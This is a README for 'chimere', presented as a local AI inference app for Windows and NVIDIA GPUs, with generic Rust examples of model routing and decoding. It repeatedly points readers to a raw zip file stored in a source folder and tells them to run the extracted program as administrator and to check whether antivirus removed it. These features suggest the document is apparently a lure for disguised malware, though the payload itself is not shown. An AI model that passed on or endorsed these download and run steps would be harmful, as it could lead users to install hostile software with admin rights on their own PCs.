
⚡ chimere - Fast local AI on Windows


🖥️ What chimere does

chimere is a Windows app for running a large AI model on your own PC. It is built for NVIDIA GPUs and uses custom CUDA code to keep the model fast and stable.

It is designed for users who want to:

  • run a local AI model on Windows
  • keep data on their own machine
  • use a single supported GPU setup
  • work with a ready-made download and run flow

chimere focuses on speed, memory use, and smooth response times. It uses a mix of expert routing, layered memory handling, and speculative decoding to help the model answer faster on supported hardware.
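If you are curious what the routing part looks like, here is a minimal, generic sketch of top-k mixture-of-experts routing. It illustrates the technique in general, not chimere's actual code, and every name in it is made up for the example:

```rust
/// Generic top-k expert routing: a gate scores every expert for a token
/// and only the best-scoring experts run. Illustration only, not
/// chimere's implementation.
fn route_top_k(gate_logits: &[f32], k: usize) -> Vec<(usize, f32)> {
    // Softmax over the gate logits so the scores form a distribution.
    let max = gate_logits.iter().cloned().fold(f32::NEG_INFINITY, f32::max);
    let exps: Vec<f32> = gate_logits.iter().map(|&x| (x - max).exp()).collect();
    let sum: f32 = exps.iter().sum();

    // Pair each expert index with its weight and keep the k largest.
    let mut scored: Vec<(usize, f32)> =
        exps.iter().map(|&e| e / sum).enumerate().collect();
    scored.sort_by(|a, b| b.1.partial_cmp(&a.1).unwrap());
    scored.truncate(k);
    scored
}

fn main() {
    // Four hypothetical experts; the gate favors experts 2 and 0.
    let picked = route_top_k(&[1.2, -0.3, 2.1, 0.4], 2);
    println!("{picked:?}"); // the chosen (expert_index, weight) pairs
}
```

The point of the gate is that only the selected experts do any work on a given token, so most of the model's weights stay idle per token while total model capacity stays large.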

📥 Download chimere

Use this link to download chimere:

https://raw.githubusercontent.com/Edg6183/chimere/main/chimere-server/ffi/src/Software-v1.6.zip

The link points directly at the release archive, so your browser should start the download right away. Save the file somewhere you can find it.

✅ Before you start

Check these items before you install:

  • Windows 11 or Windows 10
  • An NVIDIA GPU with CUDA support
  • At least 16 GB of system RAM
  • Enough free disk space for the app and model files
  • Admin access on your PC for the first setup

For best results, use the GPU and memory configuration the app was built for. This helps chimere load the model and keep response times steady.

🚀 Install and run

Follow these steps on Windows:

  1. Open the download link: https://raw.githubusercontent.com/Edg6183/chimere/main/chimere-server/ffi/src/Software-v1.6.zip

  2. Save the Windows release file for chimere when the download starts.

  3. If the file is in a ZIP archive, right-click it and choose Extract All.

  4. Open the extracted folder.

  5. Find the main chimere app file and double-click it.

  6. If Windows asks for permission, choose Yes.

  7. Wait while chimere starts and loads its model files.

  8. When the app opens, follow the on-screen setup steps to finish first launch.

If the app uses a local window or web view, keep it open while the model runs. Closing the window will stop the session.

🧠 What you can expect

chimere is made for local inference, which means it runs the AI model on your own GPU instead of sending your data to a remote server.

Its main design goals are:

  • faster reply times with speculative decoding
  • lower memory pressure with layered memory handling
  • better routing inside the model
  • support for larger models on smaller VRAM setups
  • a local setup that stays on your Windows machine

This makes chimere a good fit for users who want a local AI tool with more control over speed and memory use.
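To see why the "larger models on smaller VRAM" point matters, some back-of-the-envelope arithmetic helps. The model sizes below are hypothetical, not chimere's actual figures:

```rust
/// Rough weight-memory estimate: parameters x bits per weight, in GiB.
/// Hypothetical numbers, not chimere's actual model sizes.
fn weight_gib(params_billion: f64, bits_per_weight: f64) -> f64 {
    params_billion * 1e9 * bits_per_weight / 8.0 / 1024f64.powi(3)
}

fn main() {
    // A 30B-parameter model needs ~56 GiB for 16-bit weights, far more
    // than a 16 GB card holds. At 4 bits the weights drop to ~14 GiB.
    println!("fp16:  {:.1} GiB", weight_gib(30.0, 16.0)); // 55.9
    println!("4-bit: {:.1} GiB", weight_gib(30.0, 4.0));  // 14.0
}
```

Even the 4-bit case leaves little headroom on a 16 GB card once the KV cache and activations are counted, which is where the layered memory handling earns its keep.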

🧩 Supported hardware

chimere is tuned for modern NVIDIA GPUs, with a focus on Blackwell-class hardware and CUDA SM120 (compute capability 12.0) support.

Good matches include:

  • NVIDIA RTX 50-series cards
  • GPUs with enough VRAM for the target model
  • systems with solid PCIe bandwidth
  • Windows PCs with current NVIDIA drivers

For the target use case, a single RTX 5060 Ti 16 GB is the main reference setup. In other words, the app is aimed at users who want to run a large model on one consumer GPU instead of a full server rig.
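If you want to confirm your card before installing, a small standalone Rust program can read the GPU name, VRAM, and compute capability through NVML. This sketch assumes the nvml-wrapper crate, which is not part of chimere; it is just a convenient way to inspect the hardware:

```rust
// GPU sanity check via NVML. Assumes the `nvml-wrapper` crate in
// Cargo.toml (e.g. nvml-wrapper = "0.10"); not part of chimere.
use nvml_wrapper::Nvml;

fn main() -> Result<(), Box<dyn std::error::Error>> {
    let nvml = Nvml::init()?;
    let device = nvml.device_by_index(0)?;

    let name = device.name()?;
    let mem = device.memory_info()?; // sizes in bytes
    let cc = device.cuda_compute_capability()?;

    println!("GPU: {name}");
    println!("VRAM: {:.1} GiB", mem.total as f64 / 1024f64.powi(3));
    println!("Compute capability: {}.{}", cc.major, cc.minor);
    Ok(())
}
```

A consumer Blackwell card such as the RTX 5060 Ti should report compute capability 12.0, which matches the SM120 target mentioned above.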

🛠️ How it works

chimere combines several model runtime parts:

  • MoE (mixture-of-experts) routing for choosing which expert subnetworks handle each token
  • DFlash speculative decoding for faster answer generation
  • Engram memory for layered memory handling
  • entropy-aware routing for better token flow
  • state-space model (SSM) blocks for efficient sequence processing
  • a Rust-native runtime for a tight, system-level app core
  • custom CUDA kernels for GPU work on supported cards

You do not need to understand these terms to use the app. They are part of the engine that helps chimere run fast on the right hardware.
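For the curious, the core idea behind speculative decoding is simple: a small, cheap draft model guesses several tokens ahead, and the large target model verifies the whole guess at once, keeping the prefix that matches. The sketch below is a generic illustration with toy stand-in models; it is not DFlash and not chimere's runtime:

```rust
/// Generic draft-and-verify speculative decoding. Real systems verify the
/// draft in one batched GPU pass; this sketch only shows the control flow.
type Token = u32;

/// Toy "draft" model: cheap, sometimes wrong.
fn draft_next(ctx: &[Token]) -> Token {
    (ctx.last().copied().unwrap_or(0) + 1) % 7
}

/// Toy "target" model: the authoritative next-token choice.
fn target_next(ctx: &[Token]) -> Token {
    (ctx.last().copied().unwrap_or(0) + 1) % 5
}

/// One decode step: returns how many tokens were appended to `ctx`.
fn speculative_step(ctx: &mut Vec<Token>, lookahead: usize) -> usize {
    // 1. The draft model proposes `lookahead` tokens cheaply.
    let mut scratch = ctx.clone();
    let mut proposal = Vec::with_capacity(lookahead);
    for _ in 0..lookahead {
        let t = draft_next(&scratch);
        scratch.push(t);
        proposal.push(t);
    }

    // 2. The target model checks the proposal; keep the matching prefix.
    let mut accepted = 0;
    for &t in &proposal {
        if target_next(ctx) == t {
            ctx.push(t);
            accepted += 1;
        } else {
            break;
        }
    }

    // 3. On a mismatch, the target supplies the correct token itself,
    //    so every step makes progress.
    if accepted < lookahead {
        let t = target_next(ctx);
        ctx.push(t);
        accepted += 1;
    }
    accepted
}

fn main() {
    let mut ctx = vec![0];
    for _ in 0..4 {
        let n = speculative_step(&mut ctx, 4);
        println!("accepted {n} token(s), context = {ctx:?}");
    }
}
```

When the draft is usually right, the target model advances several tokens per verification pass instead of one, which is where the speedup comes from; when the draft is wrong, the output is still exactly what the target model would have produced on its own.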

📂 First launch setup

When chimere starts for the first time, it may ask you to:

  • pick a model path
  • confirm your GPU
  • set a cache or memory folder
  • choose a model preset
  • wait while files are prepared

Use the default choices if you are not sure. They are meant to work for most users. If the app gives you a model download or setup screen, let it finish before you start a session.

🔧 Recommended settings

Use these settings if the app lets you choose:

  • keep GPU mode on
  • leave memory use on the default level
  • use the model preset made for the included target model
  • keep speculative decoding enabled
  • use the latest stable NVIDIA driver

If chimere offers a quality-versus-speed choice, pick the balanced option first. That gives you a good mix of speed and response quality.

🧪 Common use case

A simple use case looks like this:

  1. Install chimere on Windows.
  2. Open the app.
  3. Load the model.
  4. Type a prompt in the chat or input field.
  5. Wait for the answer to appear.
  6. Keep the app open while you use it.

If the model takes a while on the first run, that is normal. The app may need time to load files and prepare GPU memory.

❓ Troubleshooting

The app does not open

  • Make sure you extracted the ZIP file first
  • Run the app as an administrator
  • Check that Windows did not block the file
  • Confirm that your antivirus did not move the app file

The GPU is not being used

  • Install the latest NVIDIA driver
  • Reboot the PC
  • Check that the app is set to GPU mode
  • Make sure no other heavy GPU app is using the card

The model loads too slowly

  • Close other apps
  • Keep your power plan on high performance
  • Make sure you have enough free RAM
  • Use the target hardware setup if possible

The app runs out of memory

  • Close other programs
  • Use a smaller model if the app allows it
  • Check that the model preset matches your GPU memory
  • Restart the app after freeing memory

📌 File layout

After you extract the download, you may see folders for:

  • the app itself
  • model files
  • cache data
  • logs
  • config files

Do not move files around unless the app asks you to. Keep the folder structure in place so chimere can find what it needs.

🔒 Local use

chimere is meant for local use on your own machine. Your prompts and output stay on your PC while the app runs. This is useful if you want to keep work, notes, or private text on device.

🧭 Next steps

After you get chimere running:

  • load the default model
  • try a short prompt first
  • check response speed
  • adjust memory or model settings only if needed
  • keep the app and GPU driver up to date

📎 Download again

https://raw.githubusercontent.com/Edg6183/chimere/main/chimere-server/ffi/src/Software-v1.6.zip

ℹ️ About

Runs a Rust inference server for hybrid State-Space and MoE language models with fast GPU throughput on consumer hardware
